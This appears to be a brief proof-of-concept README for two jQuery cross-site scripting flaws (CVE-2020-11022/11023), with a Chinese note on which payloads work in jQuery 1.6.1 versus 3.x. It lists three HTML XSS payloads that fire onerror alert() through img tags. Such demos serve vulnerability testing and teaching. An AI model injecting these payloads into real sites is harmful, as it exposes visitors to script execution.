jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)

* 这里JQuery版本为1.6.1 所以生效的POC为poc1和poc3 感兴趣的朋友可以自行修改导入版本为3.x 测试poc2

PoC 1

<style><style /><img src=x onerror=alert(2)>

PoC 2 (Only jQuery 3.x affected)

<img alt="<x" title="/><img src=x onerror=alert("1st")>">

PoC 3

<option><style></option></select><img src=x onerror=alert("1st")></style>